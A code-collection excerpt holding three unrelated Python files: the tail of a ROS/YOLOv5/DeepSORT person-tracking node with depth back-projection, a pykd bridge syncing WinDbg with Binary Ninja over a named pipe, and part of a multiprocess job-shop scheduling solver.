max_age=cfg.DEEPSORT.MAX_AGE, n_init=cfg.DEEPSORT.N_INIT, nn_budget=cfg.DEEPSORT.NN_BUDGET,
use_cuda=True)
# Initialize
device = select_device(opt.device)
half = device.type != 'cpu' # half precision only supported on CUDA
# Load model
model = torch.load(weights, map_location=device)[
'model'].float() # load to FP32
model.to(device).eval()
if half:
model.half() # to FP16
# Set Dataloader
vid_path, vid_writer = None, None
view_img = True
cudnn.benchmark = True # set True to speed up constant image size inference
dataset = LoadRealsense('0',img_size=imgsz)
# Get names and colors
names = model.module.names if hasattr(model, 'module') else model.names
# Run inference
t0 = time.time()
img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
# run once
_ = model(img.half() if half else img) if device.type != 'cpu' else None
for frame_idx, (path, img, im0, depth) in enumerate(dataset):
t4 = time.time()
self.thistime = rospy.Time.now()
img = torch.from_numpy(img).to(device)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
if img.ndimension() == 3:
img = img.unsqueeze(0)
# Inference
t1 = time_synchronized()
pred = model(img, augment=opt.augment)[0]
# Apply NMS
# [xyxy, conf, cls] n*6
pred = non_max_suppression(
pred, opt.conf_thres, opt.iou_thres, classes=opt.classes, agnostic=opt.agnostic_nms)
t2 = time_synchronized()
# Print time (inference + NMS)
print('Done. (%.3fs)' % ( t2 - t1))
# Process detections
for i, det in enumerate(pred): # detections per image
im0 = im0.copy()
if det is not None and len(det):
                    # Rescale boxes from img_size to im0 size, i.e. fix up the xyxy coordinates
det[:, :4] = scale_coords(
img.shape[2:], det[:, :4], im0.shape).round()
bbox_xywh = []
confs = []
# Adapt detections to deep sort input format
                    # DeepSORT expects detections as center_x, center_y, w, h, confidence
for *xyxy, conf, cls in det:
x_c, y_c, bbox_w, bbox_h = bbox_rel(*xyxy)
obj = [x_c, y_c, bbox_w, bbox_h]
bbox_xywh.append(obj)
confs.append([conf.item()])
xywhs = torch.Tensor(bbox_xywh)
confss = torch.Tensor(confs)
# Pass detections to deepsort
# outputs : x1 y1 x2 y2 id
outputs = deepsort.update(xywhs, confss, im0)
# draw boxes for visualization
if len(outputs) > 0:
bbox_xyxy = outputs[:, :4]
identities = outputs[:, -1]
draw_boxes(im0, bbox_xyxy, identities)
t3 = rospy.Time.now()
#self.publish3dbox(depth,bbox_xyxy,identities)
# if not self.init:
# import threading
# thread = threading.Thread(target=self.publish3dbox,args=(depth,bbox_xyxy,identities))
# thread.start()
# self.init = 1
                        # print('thread started successfully')
                        print(f'Creating MarkerArray took {(rospy.Time.now()-t3).to_sec()} s')
else:
deepsort.increment_ages()
# Stream results
if view_img:
cv2.imshow('watchout', im0)
if cv2.waitKey(1) == ord('q') or rospy.is_shutdown(): # q to quit
# thread.join()
print('Done. (%.3fs)' % (time.time() - t0))
raise StopIteration
self.lasttime = self.thistime
t5 = time.time()
print('t5-t4',t5-t4)
# @jit
def create_box(self,depth_img,box,offset=(0,0)):
        # Back-projection: x = (u*depth - cx*depth)/fx, y = (v*depth - cy*depth)/fy
        # First multiply the homogeneous pixel coordinates (u, v, 1) by depth
x1,y1,x2,y2 = [int(i) for i in box]
w = x2 - x1
h = y2 - y1
        # Crop to the golden-ratio inner region of the box to discard background pixels
import math
u1 = math.ceil(x1+0.382*w)
u2 = math.ceil(x1+0.618*w)
v1 = math.ceil(y1+0.382*h)
v2 = math.ceil(y1+0.618*h)
uv1 = []
for u in range(u1,u2):
for v in range(v1,v2):
depth = float(depth_img[v,u])*self.scale
if depth > self.depth_thres:
continue
else:
uv1.append([u*depth,v*depth,depth])
        if len(uv1) < 1:
            print("create_box: no valid depth readings inside the box")
            return 0, 0, None
# 3*n
uvd = np.array(uv1).T
        # Multiply uvd by the matrix K (inverse intrinsics) to get camera-frame xyz; camera xyz corresponds to yzx in marker space
# n*3
yzx = self.K.dot(uvd).T
        # Use the mean as a stand-in for the centroid
cx = yzx[:,2].mean()
cy = yzx[:,0].mean()
        # Find the eight corners of the bounding box
xmax = yzx[:,2].max()
xmin = yzx[:,2].min()
ymax = yzx[:,0].max()
ymin = yzx[:,0].min()
zmax = yzx[:,1].max()
zmin = yzx[:,1].min()
points = [Point(xmin,ymin,zmin),Point(xmax,ymin,zmin),
Point(xmin,ymax,zmin),Point(xmax,ymax,zmin),
Point(xmin,ymin,zmax),Point(xmax,ymin,zmax),
Point(xmin,ymax,zmax),Point(xmax,ymax,zmax)]
        # Build the bounding-box marker
marker = Marker()
marker.header.frame_id = 'map'
marker.header.stamp = rospy.Time.now()
marker.action = Marker.ADD
marker.type = Marker.LINE_LIST
# marker.lifetime = rospy.Duration(0)
marker.color.r = 1
marker.color.g = 0
marker.color.b = 0
marker.color.a = 1
marker.scale.x = 0.2
marker.points = []
for line in self.lines:
marker.points.append(points[line[0]])
marker.points.append(points[line[1]])
return cx , cy , marker
# @jit
def publish3dbox(self,depth_img,bbox,identities=None,offset=(0,0)):
markerarray = MarkerArray()
dt = (self.thistime - self.lasttime).to_sec()
idcentvel_tmp = []
        # Build the MarkerArray and match track IDs to compute centres and velocities (idcenvel)
for i,id_ in enumerate(identities):
            cx, cy, marker = self.create_box(depth_img, bbox[i], offset)
            if marker is None:
                # create_box found no valid depth readings for this box
                continue
            marker.id = id_
            markerarray.markers.append(marker)
flag = 0
            # Neat detail: self.idcenvel starts empty, so the first frame also initialises each track's timing
for idcv in self.idcenvel:
if id_ == idcv[0]:
vx = (cx - idcv[1])/dt
vy = (cy - idcv[2])/dt
idcentvel_tmp.append([id_,cx,cy,vx,vy])
flag = 1
break
if not flag:
vx=vy=0.0
idcentvel_tmp.append([id_,cx,cy,vx,vy])
self.idcenvel = idcentvel_tmp
print('idcenvel',self.idcenvel)
self.pub.publish(markerarray)
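# Standalone sketch (not part of the original script) of the back-projection used in
# Watchout.create_box: a pixel (u, v) with depth d maps to camera coordinates via the
# inverse intrinsics, x = (u - cx) * d / fx, y = (v - cy) * d / fy, z = d.  The default
# intrinsics are the values hard-coded in Watchout.__init__.
def pixel_to_camera(u, v, depth_m,
                    fx=609.2713012695312, fy=608.010498046875,
                    cx=316.67022705078125, cy=244.8178253173828):
    """Return the (x, y, z) camera-frame point for one pixel and its depth in metres."""
    return (u - cx) * depth_m / fx, (v - cy) * depth_m / fy, depth_m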
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str,
default='yolov5/weights/yolov5s.pt', help='model.pt path')
# file/folder, 0 for webcam
parser.add_argument('--source', type=str,
default='inference/images', help='source')
parser.add_argument('--output', type=str, default='inference/output',
help='output folder') # output folder
parser.add_argument('--img-size', type=int, default=640,
help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float,
default=0.4, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float,
default=0.5, help='IOU threshold for NMS')
parser.add_argument('--fourcc', type=str, default='mp4v',
help='output video codec (verify ffmpeg support)')
parser.add_argument('--device', default='',
help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--view-img', action='store_true',
help='display results')
parser.add_argument('--save-txt', action='store_true',
help='save results to *.txt')
# class 0 is person
parser.add_argument('--classes', nargs='+', type=int,
default=[0], help='filter by class')
parser.add_argument('--agnostic-nms', action='store_true',
help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true',
help='augmented inference')
parser.add_argument("--config_deepsort", type=str,
default="deep_sort_pytorch/configs/deep_sort.yaml")
args = parser.parse_args()
args.img_size = check_img_size(args.img_size)
print(args)
rospy.init_node('watchout')
watchout = Watchout()
with torch.no_grad():
watchout.watch(args)
|
windbg.py
|
from multiprocessing.connection import Listener
from pykd import *
import os
import re
import string
import sys
import threading
import time
poll_time = .25
conn = None
base = module.begin(getModulesList()[0])
bps = { }
ip = None
def start(pipe):
global conn
listener = Listener('\\\\.\\pipe\\' + pipe, backlog=0)
while True:
conn = listener.accept()
print("Connected to Binary Ninja")
event_loop(conn)
def stop(conn, reason):
conn.close()
print(reason)
def send(command, **params):
global conn
try:
conn.send((command, params))
except IOError:
return stop(conn, "Lost connection to Binary Ninja")
def event_loop(conn):
global bps
global ip
while True:
try:
if conn.poll(poll_time):
if (getExecutionStatus() == executionStatus.Go):
breakin() # COM returns before execution is stopped(?)
time.sleep(.1) # quick sleep fixes it
continue_executing = process(conn.recv())
if continue_executing:
go()
else:
process(conn.recv())
if (getExecutionStatus() == executionStatus.Go):
continue
# check if IP has changed
current_ip = getIP()
if (current_ip != ip):
update_ip(current_ip)
update_vtable(current_ip)
# check for breakpoints added or removed through windbg
if getNumberBreakpoints() != len(bps):
update_bps()
except IOError:
return stop(conn, "Lost connection to Binary Ninja")
except DbgException as e:
print(e)
send('print', message=str(e) + '. Try again - pykd is finicky')
def process(data):
print(data)
global bps
cmd, params = data
if 'bp' in cmd:
addr = params['addr'] + base
if cmd == 'set_bp' and addr not in bps:
# set unresolved BP (b/c ASLR)
dbgCommand('bu ' + findSymbol(addr, True))
# retrieve and save the BP we just created
bp = get_bp(addr)
bps[addr] = bp
elif cmd == 'delete_bp' and addr in bps:
breakpoint.remove(bps[addr])
del bps[addr]
elif cmd == 'set_ip':
setIP(params['ip'] + base)
elif cmd == 'sync':
send('set_ip', ip=getIP()-base, regs=get_regs())
for bp in bps:
send('set_bp', addr=bp-base)
elif cmd == 'go':
go()
elif cmd == 'break':
breakin()
return False # pause execution
elif cmd == 'step_out':
dbgCommand('pt; p') # stepout() is weird
elif cmd == 'step_in':
trace()
elif cmd == 'step_over':
step()
elif cmd == 'run_to':
addr = params['addr'] + base
        # because 'pa' throws an exception and won't run for some reason
dbgCommand('bu ' + findSymbol(addr, True))
go()
breakpoint.remove(get_bp(addr))
return True # continue executing
def update_ip(current_ip):
global bps
global ip
ip = current_ip
if current_ip not in bps:
send('set_ip', ip=current_ip-base, regs=get_regs())
else:
send('bp_hit', addr=current_ip-base, regs=get_regs())
def update_vtable(current_ip):
# matches symbols, e.g. {Symbol!ExampleSymbol (73b43420)}
symbol_regex = r"\{([^()]*|\([^()]*\))*\}"
# matches dereferences, e.g. [eax+30h]
deref_regex = r"\[[^\[]*\]"
# matches arithmetic in dereferences
arith_regex = r"([+-/*])"
asm = disasm.instruction(disasm(current_ip))
instr = asm.split()[2]
ptr_target = None
find_object_type = False
ptr_object = None
object = None
if instr == 'call' and re.search(symbol_regex, asm):
# target addr is between parentheses in WinDbg disasm
addr = asm[asm.find("(")+1:asm.find(")")]
if asm.find(addr+"={") != -1:
return # addr is an import
target = long(addr, 16)
elif instr == 'mov' and 'ptr' in asm.split(',')[1]:
find_object_type = True
if re.search(symbol_regex, asm):
# target has already been dereferenced by WinDbg
target = long(asm[asm.find("(")+1:asm.find(")")], 16)
else:
ptr_target = long(asm.split("=")[1], 16)
elif instr == 'lea' and re.search(deref_regex, asm):
find_object_type = True
# target (e.g. esi+30h) is between brackets in WinDbg disasm
reg_and_arith = asm[asm.find("[")+1:asm.find("]")]
# although lea doesn't actually deref memory, do it anyway
        # to get a symbol, which can then be marked as a pointer in Binja
ptr_target = expr(reg_and_arith, False)
else:
# this is not a valid vtable reference
return
# attempt to determine type of the object where the vtable's coming from
# warning: this is not always accurate (e.g. may determine it's an object
# of type Parent when it's really of type Child)
if find_object_type:
reg_and_arith = asm[asm.find("[")+1:asm.find("]")]
if '!' in reg_and_arith: # symbol
if '+' in reg_and_arith: # symbol with offset
# remove the offset and evaluate to get object address
symbol = reg_and_arith.split('+')[0]
ptr_object = expr(symbol, False)
else:
# no offset, so just extract the address provided by WinDbg
addr = reg_and_arith[reg_and_arith.find("(")+1:reg_and_arith.find(")")]
ptr_object = long(addr, 16)
elif re.search(arith_regex, reg_and_arith):
reg_name = re.split(arith_regex, reg_and_arith)[0]
ptr_object = reg(reg_name)
elif all(char in string.hexdigits for char in reg_and_arith):
ptr_object = long(reg_and_arith.strip('h'), 16)
elif reg_and_arith.isalpha():
reg_name = reg_and_arith
ptr_object = reg(reg_name)
if ptr_target is not None:
if not isValid(ptr_target):
return
target = ptrPtr(ptr_target)
if ptr_object is not None and isValid(ptr_object):
object = ptrPtr(ptr_object)
if isValid(target):
if find_object_type and object is not None:
send('vtable', instr=instr, target=target-base, object=object-base, ip=current_ip-base)
else:
send('vtable', instr=instr, target=target-base, ip=current_ip-base)
def update_bps():
global bps
current_bps = []
for index in range(0, getNumberBreakpoints()):
bp = getBp(index)
addr = breakpoint.getOffset(bp)
current_bps.append(addr)
# check for BPs added in WinDbg
if addr not in bps:
bps[addr] = bp
send('set_bp', addr=addr-base)
# check for BPs removed in WinDbg
for addr in bps.copy():
if addr not in current_bps:
del bps[addr]
send('delete_bp', addr=addr-base)
def get_bp(addr):
for index in range(0, getNumberBreakpoints()):
bp = getBp(index)
if breakpoint.getOffset(bp) == addr:
return bp
def get_regs():
regs = { }
# TODO limited set of registers due to pykd errors
reg_names = [getRegisterName(i) for i in range(0, getNumberRegisters())
if not any(char.isdigit() for char in getRegisterName(i))]
for name in reg_names:
regs[name] = reg(name)
return regs
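# Client-side sketch (not part of this script): the Binary Ninja plugin end of the pipe
# speaks the same (command, params) tuple protocol over multiprocessing.connection;
# 'pipe_name' is whatever name was passed to this script on the command line.
def _example_client(pipe_name):
    from multiprocessing.connection import Client
    client = Client('\\\\.\\pipe\\' + pipe_name)
    client.send(('sync', {}))        # ask WinDbg for the current IP and breakpoints
    command, params = client.recv()  # e.g. ('set_ip', {'ip': ..., 'regs': {...}})
    return command, params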
pipe = sys.argv[1]
t = threading.Thread(target=start, args=[pipe])
t.daemon = True
t.start()
|
solution.py
|
import time
import random
from collections import defaultdict
import numpy as np
import copy
import multiprocessing
def process_generate_scratch(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict, data_ct_dict):
makespan, op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs = schedule_agent.generation_scratch(cur_time, job_status, machine_status, coeff_tardiness, 0)
for ind_job_check in range(schedule_agent.num_job):
name_job_check = schedule_agent.name_jobs[ind_job_check]
type_job_check = schedule_agent.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
num_op_job_check = int( schedule_agent.num_op_jobs[ind_job_check] )
idx_first_op_job_check = schedule_agent.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
if priority_job_check > 0:
pending_constraint_op = schedule_agent.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = schedule_agent.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else: # not the first operation of this job
time_comp = end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if start_time_ops[op_check] - time_comp > pending_constraint_op:
                    print('violates the pending constraint')
makespan = makespan + 99999
# penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (schedule_agent.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
makespan_dict[coeff_tardiness] = makespan
data_ct_dict[coeff_tardiness] = [op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs]
# def process_generate_scratch(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict):
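# Driver sketch (not part of the original solver): process_generate_scratch is designed
# to be launched once per tardiness coefficient, with Manager dicts collecting each
# worker's makespan and schedule; 'agent' is assumed to be an already constructed Agent.
def _run_scratch_workers(agent, cur_time, job_status, machine_status):
    manager = multiprocessing.Manager()
    makespans, schedules = manager.dict(), manager.dict()
    workers = [multiprocessing.Process(
                   target=process_generate_scratch,
                   args=(agent, cur_time, job_status, machine_status,
                         ct, makespans, schedules))
               for ct in agent.set_coeff_tardiness]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    best_ct = min(makespans, key=makespans.get)
    return best_ct, makespans[best_ct], schedules[best_ct]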
def process_generate_resume(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict, data_ct_dict):
makespan, new_op_seq_machines, new_job_seq_machines, new_start_time_op_macs, new_end_time_op_macs, new_start_time_ops, new_end_time_ops, new_mac_assignment_ops, new_flag_scheduled_ops, count_scheduled_op_macs, new_flag_scheduled_jobs = schedule_agent.generation_resume(cur_time, job_status, machine_status, coeff_tardiness, 0)
for ind_job_check in range(schedule_agent.num_job):
name_job_check = schedule_agent.name_jobs[ind_job_check]
type_job_check = schedule_agent.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
num_op_job_check = int( schedule_agent.num_op_jobs[ind_job_check] )
idx_first_op_job_check = schedule_agent.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
if priority_job_check > 0:
pending_constraint_op = schedule_agent.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = schedule_agent.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else: # not the first operation of this job
time_comp = new_end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if new_start_time_ops[op_check] - time_comp > pending_constraint_op:
                    print('violates the pending constraint')
makespan = makespan + 99999
# penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (schedule_agent.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
makespan_dict[coeff_tardiness] = makespan
data_ct_dict[coeff_tardiness] = [new_op_seq_machines, new_job_seq_machines, new_start_time_op_macs, new_end_time_op_macs, new_start_time_ops, new_end_time_ops, new_mac_assignment_ops, new_flag_scheduled_ops, count_scheduled_op_macs, new_flag_scheduled_jobs]
# def process_generate_scratch(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict):
def process_iteration_scratch(schedule_agent, ind_process, cur_time, job_status, machine_status, coeff_tardiness, makespan_comp, makespan_dict, data_ct_dict):
makespan_min = makespan_comp
op_seq_machines_min = None
job_seq_machines_min = None
start_time_op_macs_min = None
end_time_op_macs_min = None
start_time_ops_min = None
end_time_ops_min = None
mac_assignment_ops_min = None
flag_scheduled_ops_min = None
flag_scheduled_jobs_min = None
start_time_iter = time.time()
elapsed_time_iter = 0
while elapsed_time_iter < 12: # for ind_iter in range(7):
makespan, op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs = schedule_agent.generation_scratch(cur_time, job_status, machine_status, coeff_tardiness, 1)
if makespan_min == -1 or makespan < makespan_min:
for ind_job_check in range(schedule_agent.num_job):
name_job_check = schedule_agent.name_jobs[ind_job_check]
type_job_check = schedule_agent.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
# if schedule_agent.flag_scheduled_jobs[ind_job_check] != 1:
# print('unscheduled job')
# # if flag_scheduled_jobs[flag_scheduled_jobs] != 0:
num_op_job_check = int( schedule_agent.num_op_jobs[ind_job_check] )
idx_first_op_job_check = schedule_agent.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
# if self.flag_scheduled_ops[op_check] != 1:
# print('unscheduled_ operation')
# # if flag_scheduled_ops[idx_first_op_job_check + ind_op_job_check] != 1:
# if ind_op_job_check > 0:
# if self.end_time_ops[op_check - 1] > self.start_time_ops[op_check]:
# print('incorrect start time')
# # if end_time_ops[op_check - 1] > start_time_ops[op_check]:
# # if ind_op_job_check > 0:
if priority_job_check > 0:
pending_constraint_op = schedule_agent.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = schedule_agent.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else: # not the first operation of this job
time_comp = end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if start_time_ops[op_check] - time_comp > pending_constraint_op:
                            print('violates the pending constraint')
makespan = makespan + 99999
# penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (schedule_agent.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
if makespan < makespan_min:
makespan_min = makespan
op_seq_machines_min = copy.deepcopy(op_seq_machines)
job_seq_machines_min = copy.deepcopy(job_seq_machines)
start_time_op_macs_min = copy.deepcopy(start_time_op_macs)
end_time_op_macs_min = copy.deepcopy(end_time_op_macs)
start_time_ops_min = copy.deepcopy(start_time_ops)
end_time_ops_min = copy.deepcopy(end_time_ops)
mac_assignment_ops_min = copy.deepcopy(mac_assignment_ops)
flag_scheduled_ops_min = copy.deepcopy(flag_scheduled_ops)
flag_scheduled_jobs_min = copy.deepcopy(flag_scheduled_jobs)
# makespan < makespan_min:
# if makespan_min == -1 or makespan < makespan_min:
elapsed_time_iter = time.time() - start_time_iter
# while elapsed_time_iter < 14:
makespan_dict[ind_process] = makespan_min
data_ct_dict[ind_process] = [op_seq_machines_min, job_seq_machines_min, start_time_op_macs_min, end_time_op_macs_min, start_time_ops_min, end_time_ops_min, mac_assignment_ops_min, flag_scheduled_ops_min, flag_scheduled_jobs_min]
# def process_iteration_scratch(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict, data_ct_dict):
def process_iteration_resume(schedule_agent, ind_process, cur_time, job_status, machine_status, coeff_tardiness, makespan_comp, makespan_dict, data_dict):
makespan_min = makespan_comp
op_seq_machines_min = None
job_seq_machines_min = None
start_time_op_macs_min = None
end_time_op_macs_min = None
start_time_ops_min = None
end_time_ops_min = None
mac_assignment_ops_min = None
flag_scheduled_ops_min = None
count_scheduled_op_macs_min = None
flag_scheduled_jobs_min = None
start_time_iter = time.time()
elapsed_time_iter = 0
while elapsed_time_iter < 12: # for ind_iter in range(8):
makespan, new_op_seq_machines, new_job_seq_machines, new_start_time_op_macs, new_end_time_op_macs, new_start_time_ops, new_end_time_ops, new_mac_assignment_ops, new_flag_scheduled_ops, count_scheduled_op_macs, new_flag_scheduled_jobs = schedule_agent.generation_resume(cur_time, job_status, machine_status, coeff_tardiness, 1)
# makespan, op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs = schedule_agent.generation_scratch(cur_time, job_status, machine_status, coeff_tardiness, 1)
if makespan_min == -1 or makespan < makespan_min:
for ind_job_check in range(schedule_agent.num_job):
name_job_check = schedule_agent.name_jobs[ind_job_check]
type_job_check = schedule_agent.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
# if schedule_agent.flag_scheduled_jobs[ind_job_check] != 1:
# print('unscheduled job')
# # if flag_scheduled_jobs[flag_scheduled_jobs] != 0:
num_op_job_check = int( schedule_agent.num_op_jobs[ind_job_check] )
idx_first_op_job_check = schedule_agent.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
# if self.flag_scheduled_ops[op_check] != 1:
# print('unscheduled_ operation')
# # if flag_scheduled_ops[idx_first_op_job_check + ind_op_job_check] != 1:
# if ind_op_job_check > 0:
# if self.end_time_ops[op_check - 1] > self.start_time_ops[op_check]:
# print('incorrect start time')
# # if end_time_ops[op_check - 1] > start_time_ops[op_check]:
# # if ind_op_job_check > 0:
if priority_job_check > 0:
pending_constraint_op = schedule_agent.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = schedule_agent.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else: # not the first operation of this job
time_comp = new_end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if new_start_time_ops[op_check] - time_comp > pending_constraint_op:
                            print('violates the pending constraint')
makespan = makespan + 99999
# penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (schedule_agent.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
if makespan < makespan_min:
makespan_min = makespan
op_seq_machines_min = copy.deepcopy(new_op_seq_machines)
job_seq_machines_min = copy.deepcopy(new_job_seq_machines)
start_time_op_macs_min = copy.deepcopy(new_start_time_op_macs)
end_time_op_macs_min = copy.deepcopy(new_end_time_op_macs)
start_time_ops_min = copy.deepcopy(new_start_time_ops)
end_time_ops_min = copy.deepcopy(new_end_time_ops)
mac_assignment_ops_min = copy.deepcopy(new_mac_assignment_ops)
flag_scheduled_ops_min = copy.deepcopy(new_flag_scheduled_ops)
count_scheduled_op_macs_min = copy.deepcopy(count_scheduled_op_macs)
flag_scheduled_jobs_min = copy.deepcopy(new_flag_scheduled_jobs)
# if makespan < makespan_min:
# if makespan_min == -1 or makespan < makespan_min:
elapsed_time_iter = time.time() - start_time_iter
# while elapsed_time_iter < 13:
makespan_dict[ind_process] = makespan_min
data_dict[ind_process] = [op_seq_machines_min, job_seq_machines_min, start_time_op_macs_min, end_time_op_macs_min, start_time_ops_min, end_time_ops_min, mac_assignment_ops_min, flag_scheduled_ops_min, count_scheduled_op_macs_min, flag_scheduled_jobs_min]
# def process_iteration_scratch(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict, data_ct_dict):
class Trainer:
def __init__(self, Env, conf_list):
self.conf_list = conf_list
self.Env = Env
self.checkpoint = None
self.iter = 0
# def __init__(self, Env, conf_list):
def train(self, run_time):
env = self.Env(self.conf_list[0])
# obs = env.reset()
machine_status, job_status, t, job_list = env.reset()
return Agent(env.job_types, env.machines)
# def train(self, run_time):
# class Trainer:
class Agent:
def __init__(self, job_types, machines):
self.machines = machines
self.job_types = job_types
self.total_num_ops = -1
self.total_num_machines = 0
self.perc_pend_time = 0.8
self.set_coeff_tardiness = [1.0, 0.5, 0.2, 0.1, 0.05, 0.01]
# coeff_tardiness = 0.5
# num_cpu = multiprocessing.cpu_count()
num_op_job_types = {} # np.zeros(num_job_type)
key_dict_job_types = self.job_types.keys()
num_job_types = len(key_dict_job_types)
keys_job_types = []
hash_ind_job_types = {}
ind_job_type = 0
for key_job_type in key_dict_job_types:
keys_job_types.append(key_job_type)
num_op_temp = len(self.job_types[key_job_type])
num_op_job_types[key_job_type] = num_op_temp
hash_ind_job_types[key_job_type] = ind_job_type
ind_job_type = ind_job_type + 1
# for key_job_type in keys_job_type:
num_kind_mac = len(self.machines)
num_machine_types = {}
hash_ind_mac_types = {}
name_macs = []
idx_mac_types = {}
count_ind_mac = 0
for machine_temp in self.machines:
num_machine_types[machine_temp] = len(self.machines[machine_temp])
idx_mac_types[machine_temp] = count_ind_mac
# count_ind_mac = count_ind_mac + num_machine_types[machine_temp]
self.total_num_machines = self.total_num_machines + num_machine_types[machine_temp]
for ind_mac in range(num_machine_types[machine_temp]):
mac_name_temp = self.machines[machine_temp][ind_mac]
name_macs.append(mac_name_temp)
hash_ind_mac_types[mac_name_temp] = ind_mac
count_ind_mac = count_ind_mac + 1
# for ind_mac in range(num_machine_types[machine_temp]):
# for machine_temp in self.machines:
keys_mac_types = []
process_time_mac_jobs = {}
for machine_temp in self.machines:
keys_mac_types.append(machine_temp)
process_time_mac_jobs[machine_temp] = {}
for key_job_type in key_dict_job_types:
processing_time_temp = -1
for ind_op_temp in range(num_op_job_types[key_job_type]):
if self.job_types[key_job_type][ind_op_temp]['machine_type'] == machine_temp:
processing_time_temp = self.job_types[key_job_type][ind_op_temp]['process_time']
break
# if self.job_types[key_job_type][ind_op_temp]['machine_type'] == machine_temp:
# for ind_op_temp in range(num_op_job_types[key_job_type]):
process_time_mac_jobs[machine_temp][key_job_type] = processing_time_temp
# for key_job_type in key_dict_job_types:
# for machine_temp in self.machines:
max_num_comb_per_delta = 20
threshold_num_iter = 5
num_iter_expansion = 50
delta_comb_macs = {}
# comb_list_macs = {}
# delta_list_macs = {}
min_delta_macs = {}
for machine_temp in self.machines:
delta_comb_macs[machine_temp] = {}
count_unique_delta = 0
min_delta_temp = 0
comb_list = []
delta_list = []
comb_ele = [0 for _ in range(num_job_types)]
for ind_job_type in range(num_job_types):
key_job_type = keys_job_types[ind_job_type]
if process_time_mac_jobs[machine_temp][key_job_type] != -1:
comb_minus = comb_ele.copy()
comb_plus = comb_ele.copy()
comb_minus[ind_job_type] = 1
comb_list.append([comb_minus,comb_plus])
delta_temp = -process_time_mac_jobs[machine_temp][key_job_type]
delta_list.append(delta_temp)
if delta_temp not in delta_comb_macs[machine_temp]:
delta_comb_macs[machine_temp][delta_temp] = []
count_unique_delta = count_unique_delta + 1
# if delta_temp not in delta_comb_macs[machine_temp]:
if max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_temp]):
delta_comb_macs[machine_temp][delta_temp].append([comb_minus,comb_plus])
# if max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_temp]):
if delta_temp < min_delta_temp:
min_delta_temp = delta_temp
# if delta_temp < min_delta_temp:
# if process_time_mac_jobs[machine_temp][key_job_type] != -1:
# for key_job_type in key_dict_job_types:
